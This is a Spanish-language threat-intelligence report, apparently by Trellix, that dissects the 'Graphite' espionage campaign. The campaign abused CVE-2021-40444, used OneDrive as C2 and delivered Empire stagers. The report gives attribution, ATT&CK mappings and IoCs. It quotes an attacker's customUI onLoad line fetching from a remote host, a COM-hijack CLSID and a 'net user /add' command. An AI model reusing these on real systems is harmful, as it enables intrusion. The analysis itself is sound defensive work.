Visita guiada a los productos Solicitar una demostración Evaluación de ciberseguridad Póngase en contacto con nosotros

Artículos

Últimas tendencias en ciberseguridad, mejores prácticas,
vulnerabilidades y mucho más

Oficina del primer ministro comprometida: todo sobre la reciente campaña de espionaje

Resumen

Nuestro equipo de investigación Advanced Threat Research ha identificado una campaña de espionaje multifase dirigida contra altos funcionarios públicos encargados de la supervisión de la política de seguridad nacional y ejecutivos del sector de la defensa en Asia Occidental. Aquí describimos los componentes técnicos de este ataque, pero hemos informado a las víctimas antes de su publicación y hemos proporcionado toda la información necesaria para eliminar todos estos componentes conocidos de su entorno.

La cadena de infección comienza con la ejecución de un archivo de descarga Excel, muy probablemente enviado a la víctima por correo electrónico, que explota una vulnerabilidad de ejecución remota de código MSHTML (CVE-2021-40444) para ejecutar un ejecutable malicioso en la memoria. El ataque utiliza un malware de seguimiento que hemos denominado Graphite porque utiliza la API Microsoft Graph para hacer uso de OneDrive como servidor de mando y control, una técnica que nuestro equipo no había visto antes. Además, el ataque se dividió en varias etapas para mantenerlo lo más oculto posible.

Las funciones de mando y control utilizaron un servidor Empire preparado en julio de 2021, mientras que la campaña propiamente dicha se activó entre octubre y noviembre de 2021. El artículo siguiente explica el funcionamiento interno, la victimología, la infraestructura y la cronología del ataque y, por supuesto, revela los indicadores de peligro y las técnicas de MITRE ATT&CK.

Varios indicadores de ataque y aparentes objetivos geopolíticos recuerdan a los relacionados con el ciberdelincuente APT28, descubierto con anterioridad. Aunque no tenemos por costumbre atribuir campañas basándonos únicamente en pruebas como estas, creemos con un grado moderado de confianza que nuestra suposición es acertada. Dicho esto, por la configuración de la infraestructura, el código de malware y la operación, tenemos el firme convencimiento de que nos enfrentamos a un ciberdelincuente muy hábil.

Los clientes de Trellix están protegidos por diferentes productos de McAfee Enterprise y FireEye suministrados con estos indicadores.

Análisis del proceso de ataque

Esta sección proporciona un análisis de todo el proceso de ataque a partir de la ejecución del archivo Excel que contenía un exploit para la vulnerabilidad de ejecución remota de código MSHTML (CVE-2021-40444). Este exploit servía para ejecutar un archivo DLL malicioso que actuaba como archivo de descarga para el malware de la tercera etapa que hemos denominado Graphite. Graphite es una muestra de malware recién descubierta basada en un stager OneDrive de Empire que utiliza cuentas de OneDrive como servidor de mando y control a través de la API Microsoft Graph.

Las últimas etapas de este ataque multifase, que en nuestra opinión está relacionado con una operación APT, incluye la ejecución de diferentes stagers de Empire hasta finalmente descargar un agente de Empire en los ordenadores de las víctimas y conectar con el servidor de mando y control para controlar los sistemas de forma remota.

El diagrama siguiente muestra el proceso general del ataque.

Figura 1. Flujo del ataque
Primera etapa: archivos de descarga Excel

Como ya hemos dicho, en la primera etapa del ataque probablemente se utiliza un mensaje de correo electrónico de phishing para inducir a las víctimas a abrir un archivo Excel denominado "parliament_rew.xlsx". A continuación puede ver la información de identificación de este archivo:

Tipo de archivo Documento con formato Microsoft Office Open XML
Nombre de archivo parliament_rew.xlsx
Tamaño de archivo 19,26 kB
Tiempo de compilación 05/10/2021
MD5 8e2f8c95b1919651fcac7293cb704c1c
SHA-256 f007020c74daa0645b181b7b604181613b68d195bd585afd71c3cd5160fb8fc4

Figura 2. Texto de señuelo observado en el archivo Excel

Cuando analizamos la estructura de este archivo, vimos que incluía una carpeta denominada "customUI" con un archivo llamado "customUI.xml". Al abrir este archivo en un editor de texto, observamos que el documento malicioso utiliza la propiedad "CustomUI.OnLoad" del formato Open XML para cargar un archivo externo de un servidor remoto:

<customUI xmlns="http://schemas.microsoft.com/office/2006/01/customui" onLoad='https://wordkeyvpload[.]net/keys/parliament_rew.xls!123'> </customUI>

Esta técnica permite a los ciberdelincuentes eludir algunos motores de análisis antivirus y herramientas de análisis de Office, lo que reduce las posibilidades de que los documentos sean detectados.

El archivo descargado es de nuevo una hoja de cálculo Excel, pero esta vez se ha guardado con el antiguo formato de archivo binario de Microsoft Office Excel 97-2003 (.xls). A continuación puede ver la información de identificación de este archivo:

Tipo de archivo Formato de archivo binario de Microsoft Office Excel 97-2003
Nombre de archivo parliament_rew.xls
Tamaño de archivo 20 kB
Tiempo de compilación 05/10/2021
MD5 abd182f7f7b36e9a1ea9ac210d1899df
SHA-256 7bd11553409d635fe8ad72c5d1c56f77b6be55f1ace4f77f42f6bfb4408f4b3a

Al analizar los objetos de los metadatos, pudimos identificar que el creador empleaba la página de códigos 1252, utilizada en los países de Europa occidental, y que el archivo se creó el 5 de octubre de 2021.

Figura 3. Metadatos del documento

Más tarde, analizamos los objetos OLE del documento y descubrimos una estructura OLEStream de objeto vinculado que contiene un enlace al exploit de la vulnerabilidad CVE-2021-40444 alojado en el servidor del agresor. Esto permite que el documento descargue automáticamente el archivo HTML y a continuación llame al motor de Internet Explorer para que lo interprete, lo que provoca la ejecución del exploit.

Figura 4. Enlace remoto en objeto OLE

En este artículo no examinamos los entresijos de la vulnerabilidad CVE-2021-40444, puesto que ya se ha explicado y tratado públicamente. Preferimos continuar con el análisis del ejecutable DLL de la segunda etapa contenido en el archivo CAB del exploit.

Segunda etapa: archivo de descarga DLL

La segunda etapa es un ejecutable DLL de nombre fontsubc.dll extraído del archivo CAB utilizado en el exploit antes mencionado. A continuación puede ver la información de identificación de este archivo:

Tipo de archivo Ejecutable PE32 para Microsoft Windows (DLL) (consola) Intel 80386 de 32 bits
Nombre de archivo fontsubc.dll
Tamaño de archivo 88,50 KB
Tiempo de compilación 28/09/2021
MD5 81de02d6e6fca8e16f2914ebd2176b78
SHA-256 1ee602e9b6e4e58dfff0fb8606a41336723169f8d6b4b1b433372bf6573baf40

Este archivo exporta una función llamada "CPlApplet" que Windows reconoce como aplicación del panel de control. Básicamente, esta función activa un archivo de descarga del malware de la etapa siguiente, que se encuentra en hxxps://wordkeyvpload[.]net/keys/update[.]dat, utilizando objetos COM y la API "URLOpenBlockingStreamW".

Figura 5. Descarga de malware de la etapa siguiente

Una vez descargado el archivo, el malware lo descifra con una clave pública RSA incrustada y comprueba su integridad calculando un SHA-256 de la carga útil descifrada. Por último, el malware asigna memoria virtual, copia la carga útil en ella y la ejecuta.

Figura 6. Descifrado y ejecución de la carga útil

Antes de ejecutar la carga útil descargada, el malware compara los cuatro primeros bytes con el valor mágico DE 47 AC 45 en hexadecimal; si son diferentes, no ejecuta la carga útil.

Figura 7. Valor mágico del malware

Tercera etapa: malware Graphite

La tercera etapa es un ejecutable DLL, nunca escrito en disco, denominado dfsvc.dll, que pudimos extraer de la memoria de la etapa anterior. A continuación puede ver la información de identificación de este archivo:

Tipo de archivo Ejecutable PE32 para Microsoft Windows (DLL) (consola) Intel 80386 de 32 bits
Nombre de archivo dfsvc.dll
Tamaño de archivo 24 KB
Tiempo de compilación 20/09/2021
MD5 0ff09c344fc672880fdb03d429c7bda4
SHA-256 f229a8eb6f5285a1762677c38175c71dead77768f6f5a6ebc320679068293231

A este malware lo bautizamos con el nombre de Graphite porque emplea la API Microsoft Graph para utilizar OneDrive como servidor de mando y control. Es muy probable que los desarrolladores de Graphite utilizaran el stager OneDrive de Empire como referencia por las similitudes de funcionalidad y por la estructura de archivos de la cuenta de los ciberdelincuentes en OneDrive.

Figura 8. Solicitudes de la API al stager OneDrive de Empire

Graphite empieza creando un mutex con el nombre codificado de forma rígida "250gHJAWUI289382s3h3Uasuh289di" para evitar dobles ejecuciones, descifrar las cadenas y resolver dinámicamente las API que utilizará después. Moreover, it will calculate a bot identifier to identify the infected computer which is a CRC32 checksum of the value stored in the registry key “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Cryptography\MachineGuid”.

Figura 9. Inicializaciones de Graphite

A continuación, el malware crea un subproceso para supervisar la ejecución de tareas y cargar sus resultados en la cuenta de OneDrive. Los archivos de resultados se cargan en la carpeta "update" de la cuenta del agresor en OneDrive.

Figura 10. Subproceso para supervisar los resultados de las tareas

Después, el malware entra en un bucle infinito en el cual, cada 20 minutos, obtiene un nuevo token OAuth2 para utilizarlo con las solicitudes de la API Microsoft Graph y determinar si hay nuevas tareas que ejecutar en la carpeta "check" de la cuenta de OneDrive del agresor.

Figura 11. Solicitud de nuevo token OAuth2

Una vez obtenido un token OAuth2 válido, se reúnen datos de reconocimiento que contengan la siguiente información de los sistemas de las víctimas:

  • Procesos en ejecución
  • Versión del CLR de .NET de PowerShell
  • Versión del SO Windows

Los datos se comprimen con el algoritmo LZNT1 y se cifran con una clave AES-256-CBC codificada de forma rígida con un IV aleatorio. Las tareas del operador se codifican del mismo modo. Por último, el archivo que contiene la información del sistema se carga en la carpeta "{BOT_ID}/update" de OneDrive con un nombre aleatorio.

Figura 12. Datos de codificación de Graphite

Graphite también consulta comandos nuevos enumerando los archivos secundarios del subdirectorio "check". Si encuentra un archivo nuevo, utiliza la API Microsoft Graph para descargar su contenido y descifrarlo. Las tareas descifradas tienen dos campos; el primero es un identificador único de la tarea y el segundo especifica el comando que se va a ejecutar.

El valor de comando "1" indica al malware que vuelva a enviar la información del sistema al mando y control, que es el OneDrive del agresor. El valor de comando "2" indica que la tarea descifrada es un código shell, por lo que el malware creará un subproceso para ejecutarlo.

Figura 13. Comandos de Graphite

Si la tarea recibida es un código shell, comprueba el tercer campo con el valor mágico DE 47 AC 45 en hexadecimal y, si son diferentes, no ejecuta la carga útil. El resto de bytes de la tarea es el código shell que va a ejecutarse. Finalmente, los archivos de la tarea se borran de OneDrive una vez procesados.

Figura 14. Tarea del operador descifrada

El diagrama siguiente resume el flujo del malware Graphite.

Figura 15. Diagrama de ejecución de Graphite

Cuarta etapa: stager launcher DLL de Empire

La cuarta etapa es un archivo de biblioteca dinámica denominado csiresources.dll que pudimos extraer de una tarea de la etapa anterior. El archivo estaba incrustado en una tarea del código shell de Graphite que servía para cargar reflexivamente el ejecutable en la memoria del proceso y ejecutarlo. A continuación puede ver la información de identificación de este archivo:

Tipo de archivo Ejecutable PE32 para Microsoft Windows (DLL) (consola) Intel 80386 de 32 bits
Nombre de archivo csiresources.dll
Tamaño de archivo 111 KB
Tiempo de compilación 21/09/2021
MD5 138122869fb47e3c1a0dfe66d4736f9b
SHA-256 25765faedcfee59ce3f5eb3540d70f99f124af4942f24f0666c1374b01b24bd9

La muestra es un stager launcher DLL de Empire que inicializa y carga el tiempo de ejecución del CLR de .NET en un proceso no gestionado y ejecuta un cradle de descarga para agregar un agente de Empire. Con él, el agente de Empire puede ejecutarse en un proceso que no sea PowerShell.exe.

Primero, el malware comprueba si se está ejecutando desde el proceso explorer.exe. Si no es el caso, el malware finaliza.

Figura 16. Comprobación del nombre del proceso

A continuación el malware intenta encontrar el archivo "EhStorShell.dll" en la carpeta System32 y cargarlo. De esta manera, el malware se asegura de que el archivo "EhStorShell.dll" original esté cargado en el contexto de explorer.exe.

Figura 17. Carga de la biblioteca EhStorShell.dll

La operación anterior es importante porque el malware de seguimiento anula el CLSID "{D9144DCD-E998-4ECA-AB6A-DCD83CCBA16D}" para obtener persistencia en el sistema de las víctimas realizando una técnica de secuestro de COM. El CLSID mencionado corresponde al "DLL de extensión de shell de Almacenamiento mejorado” y lo gestiona el archivo "EhStorShell.dll".

Ahora, el malware carga, inicializa y arranca el tiempo de ejecución del CLR de .NET, descifra con XOR la carga útil de la etapa siguiente de .NET y la carga en memoria. Por último, ejecuta el archivo con el tiempo de ejecución de .NET.

Figura 18. Descifrado del malware de la etapa siguiente

Quinta etapa: stager PowerShell C# de Empire

La quinta etapa es un ejecutable de .NET denominado Service.exe incorporado y cifrado en la etapa anterior. A continuación puede ver la información de identificación de este archivo:

Tipo de archivo Ejecutable PE32 para Microsoft Windows (consola) Intel 80386 32 de bits
Tamaño de archivo 34 KB
MD5 3b27fe7b346e3dabd08e618c9674e007
SHA-256 d5c81423a856e68ad5edaf410c5dfed783a0ea4770dbc8fb4943406c316a4317

Esta muestra es un stager PowerShell C# de Empire cuyo principal objetivo es crear una instancia de un objeto PowerShell, descifrar el script PowerShell incrustado con XOR y descodificarlo con Base64 antes de ejecutar finalmente la carga útil con la función Invoke.

Figura 19. Código de la quinta etapa

La razón de utilizar un ejecutable .NET para cargar y ejecutar código de PowerShell es eludir medidas de seguridad como AMSI para permitir la ejecución desde un proceso que no debería permitirlo.

Sexta etapa: stager HTTP PowerShell de Empire

La última etapa es un script de PowerShell, específicamente un stager HTTP de Empire, incrustado y cifrado en la etapa anterior. A continuación puede ver la información de identificación de este archivo:

Tipo de archivo Script de PowerShell
Tamaño de archivo 6 KB
MD5 a81fab5cf0c2a1c66e50184c38283e0e
SHA-256 da5a03bd74a271e4c5ef75ccdd065afe9bd1af749dbcff36ec7ce58bf7a7db37

Como hemos mencionado antes, esta es la última etapa del ataque multifase y es un stager HTTP altamente ofuscado con el script Invoke-Obfuscation de Empire para dificultar su análisis.

Figura 20. Script de PowerShell ofuscado

La principal funcionalidad del script es contactar con hxxp://wordkeyvpload[.]org/index[.]jsp para enviar la información inicial sobre el sistema y conectarse a la URL hxxp://wordkeyvpload[.]org/index[.]php para descargar el agente de Empire cifrado, descifrarlo con AES-256 y ejecutarlo.

Cronología de eventos

Basándonos en todas las actividades controladas y analizadas, proponemos la siguiente cronología de eventos:

Figura 21. Cronología de la campaña

Destinatarios

Es posible que uno de los documentos de señuelo mencionados antes (denominado "parliament_rew.xlsx") estuviera destinado a funcionarios de la Administración.

Además de atacar a organismos públicos, parece que este adversario también había puesto sus miras en el sector de defensa. Otro documento titulado "Missions Budget.xlsx" contenía en inglés el texto "Misiones y operaciones militares y civiles" y los presupuestos en dólares de las operaciones militares en algunos países para los años 2022 y 2023.

Figura 22. Documento de señuelo dirigido al sector de defensa

Además, en nuestros datos de telemetría también hemos observado que los autores de esta campaña mostraban interés por Polonia y otros países de Europa oriental.

No se conoce la victimología completa de los ciberdelincuentes, pero los documentos de señuelo examinados demuestran que sus actividades se concentran en regiones y sectores específicos. Por el nombre, el contenido de los archivos Excel maliciosos y nuestra telemetría, parece que los ciberdelincuentes tienen como objetivo a países de Europa oriental y que los sectores más frecuentes son los de defensa y Administración pública.

Infraestructura

Gracias al análisis de toda la cadena de ataque, se identificaron dos hosts involucrados. El primer dominio es wordkeyvpload.net, que se resuelve en la IP 131.153.96.114 localizada en Serbia y registrada el 7 de julio de 2021 a nombre de OwnRegistrar Inc.

Al consultar la IP con una herramienta de búsqueda DNS inversa, se obtuvo un registro PTR que conducía al dominio "bwh7196.bitcoinwebhosting.net", lo cual podría indicar que el servidor se compró a la distribuidora Bitcoin Web Hosting VPS.

Figura 23. Consulta DNS inversa

La principal funcionalidad de este servidor de mando y control es alojar el exploit HTML para CVE-2021-40444 y el archivo CAB que contiene el DLL de la segunda etapa.

El segundo dominio identificado es wordkeyvpload.org, que se traduce en la IP 185.117.88.19, situada en Suecia y registrada el 18 de junio de 2021 a nombre de Namecheap Inc. Según el sistema operativo (Microsoft Windows Server 2008 R2), el servidor HTTP (Microsoft-IIS/7.5) y los puertos abiertos (1337 y 5000), es muy probable que el host utilice la última versión del marco de posexplotación Empire.

El motivo que sustenta esta hipótesis es que la configuración predeterminada de los servidores de Empire utiliza el puerto 1337 para alojar una API RESTful, mientras que el puerto 5000 aloja una interfaz SocketIO para interaccionar a distancia con el servidor. Además, al desplegar un listener HTTP, el valor predeterminado del campo HTTP Server está codificado de forma rígida como "Microsoft-IIS/7.5".

Figura 24. Ejecución local de servidor Empire con configuración predeterminada

Con la información expuesta y con la extracción del mando y control de la última etapa del malware, podemos confirmar que este host actúa como servidor de Empire para controlar de forma remota los agentes instalados en los equipos de las víctimas y enviar comandos para ejecutarlos.

Atribución

Durante la cronología de esta operación, se han producido tensiones políticas en la frontera entre Armenia y Azerbaiyán. Por lo tanto, desde el punto de vista de una operación de inteligencia clásica, sería completamente lógico infiltrarse y reunir información para evaluar el riesgo y los movimientos de las diferentes partes involucradas.

Durante nuestra investigación de la campaña de Graphite, extrajimos de nuestra telemetría todas las marcas de tiempo de la actividad de los agresores y encontramos dos tendencias constantes. En primer lugar, los días de actividad del adversario son de lunes a viernes, como muestra la imagen siguiente:

Figura 25. Días laborables del adversario

En segundo lugar, las marcas de tiempo de la actividad corresponden a un horario comercial normal (de 8 a 18 h) en la zona horaria GMT+3, que incluye la hora de Moscú, Turquía, Arabia y África oriental.

Figura 26. Horario laborable del adversario

Otro descubrimiento interesante de la investigación fue que los atacantes utilizaban el CLSID (D9144DCD-E998-4ECA-AB6A-DCD83CCBA16D) para obtener persistencia, lo que coincide con un informe de ESET en el que los investigadores mencionan una operación rusa dirigida contra países de Europa oriental.

Analizando y comparando secuencias y bloques de código del malware Graphite con nuestra base de datos de muestras, descubrimos coincidencias con muestras de 2018 atribuidas a APT28. Por ejemplo, comparamos nuestras muestras con esta: 5bb9f53636efafdd30023d44be1be55bf7c7b7d5 (sha1):

Figura 27: Comparación del código de muestras

Cuando ampliamos algunas de las funciones, en la imagen siguiente tenemos a la izquierda la muestra de Graphite y a la derecha una muestra de 2018. Con casi tres años de diferencia, parece razonable que el código haya cambiado, pero da la impresión de que el programador seguía satisfecho con alguna de las antiguas funciones:

Figura 28: Flujo de funciones similar

Aunque hemos mencionado algunas de las tácticas, técnicas y procedimientos (TTP) de los ciberdelincuentes para esta campaña, sencillamente nos falta suficiente contexto, similitudes o coincidencias que nos permitan señalar con escasa o moderada confianza a APT28 y aún menos a un patrocinador estatal. Sin embargo, por la configuración de la infraestructura, el código de malware y la operación, creemos que nos enfrentamos a un ciberdelincuente hábil.

Conclusión

El análisis de la campaña descrita en este artículo nos permitió reunir información sobre un ataque multifase perpetrado a principios de octubre, que aprovechaba la vulnerabilidad de ejecución remota de código MSHTML (CVE-2021-40444) para atacar a países de Europa oriental.

Como se ha visto en el análisis del malware Graphite, una función bastante innovadora es el uso del servicio OneDrive como mando y control consultando a la API Microsoft Graph con un token codificado de forma rígida en el malware. Este tipo de comunicación permite que el malware pase desapercibido en los sistemas de las víctimas, ya que solo se conecta a dominios legítimos de Microsoft y no muestra ningún tráfico de red sospechoso.

Gracias al análisis de todo el proceso de ataque, pudimos identificar nueva infraestructura que actúa como mando y control para los ciberdelincuentes, así como la carga útil final, que es un agente del marco posexplotación Empire. Todo lo anterior nos ha permitido construir una cronología de la actividad observada en la campaña.

Los autores de la campaña parecen muy avanzados, dados los objetivos, el malware y la infraestructura utilizados en la operación, por lo que suponemos que el objetivo principal de la campaña es el espionaje. Con una confianza baja y moderada, creemos que esta operación fue ejecutada por APT28. Para investigar más, proporcionamos algunas tácticas, técnicas y procedimientos (TTP) e indicadores sobre la infraestructura, los objetivos y las capacidades para detectar esta campaña.

Técnicas MITRE ATT&CK

Táctica
Resource Development T1583.001 Acquire Infrastructure: Domains Los agresores adquirieron dominios para utilizarlos como mando y control. wordkeyvpload[.]net
wordkeyvpload[.]org
Resource Development T1587.001 Develop capabilities: Malware Los agresores crearon componentes maliciosos para perpetrar el ataque. Malware Graphite
Resource Development T1588.002 Develop capabilities: Tool Los agresores emplearon herramientas de simulación para ejecutar el ataque. Empire
Initial Access T1566.001 Phishing: Spear phishing Attachment Los ciberdelincuentes enviaron mensajes de correo electrónico de phishing selectivo para obtener acceso a los sistemas de las víctimas. BM-D(2021)0247.xlsx
Execution T1203 Exploitation for Client Execution Los ciberdelincuentes explotaron una vulnerabilidad de Microsoft Office para ejecutar código. CVE-2021-40444
Execution T1059.001 Command and Scripting Interpreter: PowerShell Los ciberdelincuentes utilizaron PowerShell de forma ilícita para ejecutar el stager de Empire. Stager PowerShell de Empire
Persistence T1546.015 Event Triggered Execution: Component Object Model Hijacking Los adversarios establecieron persistencia ejecutando contenido malicioso activado por referencias secuestradas a objetos COM (modelo de objetos componentes). CLSID: D9144DCD-E998-4ECA-AB6A-DCD83CCBA16D
Persistence T1136.001 Create Account: Local Account Los adversarios crearon una cuenta local para mantener el acceso a los sistemas de las víctimas. net user /add user1
Defense Evasion T1620 Reflective Code Loading Los adversarios cargaron reflexivamente código en un proceso para ocultar la ejecución de cargas útiles maliciosas. Stager launcher DLL de Empire
Command and Control T1104 Multi-Stage Channels Los adversarios crearon múltiples etapas para ofuscar el canal de mando y control y dificultar la detección. Uso de diferentes stagers de Empire
Command and Control T1102.002 Web Service: Bidirectional Communication Los adversarios utilizaron un servicio web externo y legítimo existente como medio para enviar comandos y recibir resultados de un sistema comprometido a través del canal del servicio web. Servidor de Empire
en Microsoft OneDrive
Command and Control T1573.001 Encrypted Channel: Symmetric Cryptography Los adversarios emplearon un algoritmo conocido de cifrado simétrico para ocultar el tráfico de mando y control en lugar de utilizar las protecciones inherentes proporcionadas por un protocolo de comunicación. AES 256
Command and Control T1573.002 Encrypted Channel: Asymmetric Cryptography Los adversarios emplearon un algoritmo conocido de cifrado asimétrico para ocultar el tráfico de mando y control en lugar de utilizar las protecciones inherentes proporcionadas por un protocolo de comunicación. RSA

Indicadores de peligro (IoC)

Primera etapa: archivos de descarga Excel
40d56f10a54bd8031191638e7df74753315e76f198192b6e3965d182136fc2fa
f007020c74daa0645b181b7b604181613b68d195bd585afd71c3cd5160fb8fc4
7bd11553409d635fe8ad72c5d1c56f77b6be55f1ace4f77f42f6bfb4408f4b3a
9052568af4c2e9935c837c9bdcffc79183862df083b58aae167a480bd3892ad0

Segunda etapa: DLL de descarga
1ee602e9b6e4e58dfff0fb8606a41336723169f8d6b4b1b433372bf6573baf40

Tercera etapa: Graphite
35f2a4d11264e7729eaf7a7e002de0799d0981057187793c0ba93f636126135f
f229a8eb6f5285a1762677c38175c71dead77768f6f5a6ebc320679068293231

Cuarta etapa: stager launcher DLL
25765faedcfee59ce3f5eb3540d70f99f124af4942f24f0666c1374b01b24bd9

Quinta etapa: stager PowerShell C#
d5c81423a856e68ad5edaf410c5dfed783a0ea4770dbc8fb4943406c316a4317

Sexta etapa: stager HTTP PowerShell de Empire
da5a03bd74a271e4c5ef75ccdd065afe9bd1af749dbcff36ec7ce58bf7a7db37

URL
hxxps://wordkeyvpload[.]net/keys/Missions Budget Lb.xls
hxxps://wordkeyvpload[.]net/keys/parliament_rew.xls
hxxps://wordkeyvpload[.]net/keys/Missions Budget.xls
hxxps://wordkeyvpload[.]net/keys/TR_comparison.xls

hxxps://wordkeyvpload[.]net/keys/JjnJq3.html
hxxps://wordkeyvpload[.]net/keys/iz7hfD.html
hxxps://wordkeyvpload[.]net/keys/Ari2Rc.html
hxxps://wordkeyvpload[.]net/keys/OD4cNq.html

hxxps://wordkeyvpload[.]net/keys/0YOL4.cab
hxxps://wordkeyvpload[.]net/keys/whmel.cab
hxxps://wordkeyvpload[.]net/keys/UdOpQ.cab
hxxps://wordkeyvpload[.]net/keys/D9V5E.cab

hxxps://wordkeyvpload[.]net/keys/update.dat

hxxps://wordkeyvpload[.]org/index.jsp
hxxps://wordkeyvpload[.]org/index.php
hxxps://wordkeyvpload[.]org/news.php
hxxps://wordkeyvpload[.]org/admin/get.php
hxxps://wordkeyvpload[.]org/login/process.php

Dominios
wordkeyvpload[.]net
wordkeyvpload[.]org
jimbeam[.]live

IP
131.153.96[.]114
185.117.88[.]19
94.140.112[.]178

Ver novedades

La ciberseguridad no es un secreto para nosotros. Pero somos una nueva empresa.
Manténgase al día de nuestra evolución.

Introduzca una dirección de correo electrónico válida.
Nunca le enviaremos correo no deseado. Cancele la suscripción en cualquier momento.